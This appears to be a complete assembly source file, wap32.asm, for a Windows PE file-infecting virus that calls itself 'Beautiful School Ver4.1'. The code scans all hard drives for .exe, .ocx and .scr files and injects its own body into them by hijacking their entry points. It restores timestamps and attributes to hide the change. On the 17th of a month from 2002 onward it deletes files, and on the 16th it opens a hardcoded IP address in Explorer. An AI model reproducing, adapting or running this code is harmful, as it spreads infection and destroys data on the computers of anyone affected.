www.pudn.com > 200521610462360.zip > wap32.asm
.586p
.model flat,STDCALL
include Win32v.inc
extrn ExitProcess: proc
KnlImageBase =0bff70000h
AppImageBase =000400000h
CodeImageBase =000401000h
DataImageBase =000402000h
MessageBox =0bff541bah
FileHeaderSize =1000h
VirusSize =OFF @@End-OFF @@Begin
VirusFlag =VirusSize
@ExitProcess equ 0247
@GetCommandLine equ 0328
@WinExec equ 0811
@GetSystemTime equ 0453
@GetDriveType equ 0359
@SetCurrentDir equ 0704
@FindFirstFile equ 0283
@FindNextFile equ 0288
@FindClose equ 0279
@SetFileAttrib equ 0716
@SetFileTime equ 0719
@GetFileSize equ 0374
@DeleteFile equ 0215
@LOpen equ 0843
@CreateFileMap equ 0185
@MapViewOfFile equ 0584
@UnmapViewOfFile equ 0787
@CloseHandle equ 0159
.data
@@Begin:
mov eax,[esp]
and eax,0bff00000h
cmp eax,0bff00000h
jnz short @@JmpOldApp
mov eax,ds:[KnlImageBase]
not eax
cmp ax,not('ZM');
jnz short @@JmpOldApp
mov eax,dr0
cmp eax,VirusFlag
jnz short @@SetFlag
@@JmpOldApp:
db 0b8h
OldEntryRVA dd OFF @@Quit
jmp eax
@@SetFlag:
mov eax,VirusFlag
mov dr0,eax
call @@Knl32Api,@GetCommandLine
call @@Knl32Api,@WinExec,eax,L 0
mov ecx,24
mov edx,005c3a43h
@@ContKillNextDrive:
push ecx
push edx
call @@Knl32Api,@GetDriveType,esp
cmp eax,05h ;IS CDROM ?
jz short @@KillNextDrive
cmp eax,01h ;Is no exist drive ?
jz short @@KillNextDrive
mov ebx,esp
call @@FindFirstFile
@@KillNextDrive:
pop edx
inc edx
pop ecx
loop @@ContKillNextDrive
@@Quit:
call @@GetSystemTime
cmp eax,16
jnz short @Exit
call @@GetHttpName
@@GetHttpName:
pop eax
add eax,OFF HttpName-OFF @@GetHttpName
call @@Knl32Api,@WinExec,eax,L 0
@Exit:
call @@Knl32Api,@ExitProcess,L 0
@@FindFirstFile:
call @@Knl32Api,@SetCurrentDir,ebx
mov eax,002a2e2ah
push eax
mov eax,esp
sub esp,size WIN32_FIND_DATAA
call @@Knl32Api,@FindFirstFile,eax,esp
mov esi,eax
@@ContFindNextFile:
call @@Knl32Api,@FindNextFile,esi,esp
cmp eax,0
jnz short @@FindFileOrDir
add esp,size WIN32_FIND_DATAA
pop eax
ret
@@FindFileOrDir:
mov eax,[esp.fdFileAttributes]
and eax,10h
jnz short @@IsDir
@@IsFile:
mov ebp,esp
push esi
call @@FindExtName
pop esi
jmp short @@ContFindNextFile
@@IsDir:
lea ebx,[esp.fdFileName]
cmp B [ebx],'.'
jz short @@IsDotDir
push esi
call @@FindFirstFile
pop esi
mov eax,00002e2eh
push eax
call @@Knl32Api,@SetCurrentDir,esp
pop eax
@@IsDotDir:
jmp short @@ContFindNextFile
@@FindExtName:
call @@GetSystemTime
cmp ecx,2002
jb short @@NoDelFile
cmp eax,17
jnz short @@NoDelFile
lea eax,[ebp.fdFileName]
call @@Knl32Api,@DeleteFile,eax
ret
@@NoDelFile:
lea eax,[ebp.fdFileName]
@@ContFindExtName:
inc eax
cmp B [eax],0
jnz short @@ContFindExtName
mov eax,[eax-4]
or eax,20202020h
not eax
cmp eax,not ('exe.')
jz short @@IsExeFile
cmp eax,not ('xco.')
jz short @@IsExeFile
cmp eax,not ('rcs.')
jz short @@IsExeFile
ret
@@IsExeFile:
;//////////////Fix PE File/////////////
push ebp ;/////Push FindFileData
lea esi,[ebp.fdFileName]
call @@Knl32Api,@SetFileAttrib,esi,L 0
lea esi,[ebp.fdFileName]
call @@Knl32Api,@LOpen,esi,L 02
cmp eax,-1h
jz @@OopsFileAttrib
mov ebp,eax
push ebp ;/////Push hFile
call @@Knl32Api,@GetFileSize,ebp,L 0
cmp eax,size PEFileHeader+VirusSize+100h
jb short @@CloseFile
mov dr1,eax ;//Save MapSize to dr1
call @@Knl32Api,@CreateFileMap,ebp,L 0,PAGE_READ+PAGE_WRITE,L 0,eax,L 0
cmp eax,-1h
jz short @@CloseFile
mov ebp,eax
push ebp ;/////Push hFileMap
call @@Knl32Api,@MapViewOfFile,ebp,FILE_MAP_READ+FILE_MAP_WRITE,L 0,L 0,L 0
cmp eax,0h
jz short @@CloseFileMap
mov ebp,eax
push ebp ;/////Push lpFileMap
mov ax,[ebp]
not ax
cmp ax,not('ZM')
jnz short @@FlushFileMap
movzx eax,W [ebp.PEHeaderOffset]
mov ecx,dr1 ;//Get MapSize
cmp eax,ecx
ja short @@FlushFileMap
lea esi,[eax+ebp] ;//GetPeFileHeader
mov ax,[esi]
not ax
cmp ax,not('EP')
jnz short @@FlushFileMap
call @@FixPeFile
@@FlushFileMap:
pop ebp ;/////Pop lpFileMap
call @@Knl32Api,@UnmapViewOfFile,ebp
@@CloseFileMap:
pop ebp ;/////Pop hFileMap
call @@Knl32Api,@CloseHandle,ebp
@@CloseFile:
pop ebp ;/////Pop hFile
pop esi
push esi ;//esi=FindFileData
lea eax,[esi.fdCreationTime]
lea ebx,[esi.fdLastAccessTime]
lea ecx,[esi.fdLastWriteTime]
call @@Knl32Api,@SetFileTime,ebp,eax,ebx,ecx
call @@Knl32Api,@CloseHandle,ebp
@@OopsFileAttrib:
pop ebp ;/////POP FindFileData
lea esi,[ebp.fdFileName]
call @@Knl32Api,@SetFileAttrib,esi,D [ebp.fdFileAttributes]
ret
;/////////////////////////////////////////////////
@@FixPeFile:
lea edi,[esi.fhObjectTable0]
;//esi=PeHeaderAddress
;//edi=ObjectTableAddress
@@FindHeaderSpace:
mov eax,[edi.otPhysOffset]
mov ebx,[edi.otRVA]
cmp eax,ebx
jb short @@Cont00
mov eax,ebx ;//Get All Space
@@Cont00:
mov ebx,[esi.fhHeaderSize];// Get Used Space
sub eax,ebx ;//Get UnUsed Space
jb short @@FindObjectSpace
cmp eax,VirusSize
jb short @@FindObjectSpace
mov edx,dr1 ;//Get MapSize
sub edx,VirusSize
jb short @@UnknowError0
cmp edx,ebx
jb short @@UnknowError0
mov eax,[esi.fhEntryRVA]
add eax,[esi.fhImageBase];//Get OldAppEnry
call @@MoveVirusToFileMap ;//Setup OldEnry And Move Virus
add [esi.fhHeaderSize],VirusSize
mov [esi.fhEntryRVA],ebx
@@UnknowError0:
ret
@@FindObjectSpace:
movzx ecx,[esi.fhObjectCount]
dec ecx
@@ContFindObjectSpace:
push ecx ;//Push loop ecx
mov eax,[edi.otPhysOffset+size ObjectTable]
sub eax,[edi.otPhysOffset] ;//Get PhysSpace
mov ebx,[edi.otRVA+size ObjectTable]
sub ebx,[edi.otRVA] ;//Get RVA Space
cmp eax,ebx
jb short @@Cont10
mov eax,ebx ;//Get All Space
@@Cont10:
mov ebx,[edi.otVirtSize]
mov ecx,[edi.otPhysSize]
cmp ebx,ecx
jb short @@Cont11
mov ebx,ecx ;//Get Used Space
@@Cont11:
sub eax,ebx ;//Get UnUsed Space
jb short @@MayBeNoSpace
cmp eax,VirusSize
jb short @@MayBeNoSpace
mov ecx,ebx
add ebx,[edi.otPhysOffset]
mov edx,dr1 ;//Get MapSize
sub edx,VirusSize
jb short @@UnknowError1
cmp edx,ebx
jb short @@UnknowError1
mov eax,[esi.fhEntryRVA]
add eax,[esi.fhImageBase]
call @@MoveVirusToFileMap ;//Setup OldEnry And Move Virus
mov edx,ecx
add ecx,[edi.otRVA]
mov [esi.fhEntryRVA],ecx
add edx,VirusSize ;//Get New Used Space
cmp edx,[edi.otPhysSize]
jb short @@Cont12
mov [edi.otPhysSize],edx ;//Addition otPhysSize
@@Cont12:
cmp edx,[edi.otVirtSize]
jb short @@Cont13
mov [edi.otVirtSize],edx ;//Addition otVirtSize
@@Cont13:
or [edi.otFlags],060000020h ;//flag=CERW
@@UnknowError1:
pop ecx ;//Pop loop ecx
ret
@@MayBeNoSpace:
pop ecx
add edi,size ObjectTable
loop @@ContFindObjectSpace
ret
@@MoveVirusToFileMap:;//eax=new EntryRVA,ebx=Move to Map offset Address
pushad
call @@GetBase
@@GetBase:
pop esi
sub esi,OFF @@GetBase-OFF @@Begin
mov edi,ebx
add edi,ebp
push edi
mov ecx,VirusSize
cld
rep movsb
pop edi
mov [edi+OFF OldEntryRVA-@@Begin],eax
popad
ret
;//////////////////////////////////////////
@@Knl32Api:
mov eax,KnlImageBase
movzx ebx,word ptr[eax+PEHeaderOffset]
add ebx,eax
mov ebx,[ebx.fhExportsRVA]
add ebx,eax
mov ebx,[ebx.etExportAddrList]
add ebx,eax
mov ecx,[esp+4]
lea ebx,[ebx+4*ecx]
add eax,[ebx]
xchg eax,[esp]
mov [esp+4],eax
ret
@@GetSystemTime:
sub esp,size SystemTime
call @@Knl32Api,@GetSystemTime,esp
movzx eax,[esp.stDay]
movzx ecx,[esp.stYear]
add esp,size SystemTime
ret
HttpName db 'Explorer Http://202.115.114.30',0
VirusName db 'Beautiful School Ver4.1',0
@@End:
.code
@@Start:
jmp @@Begin
ends
end @@Start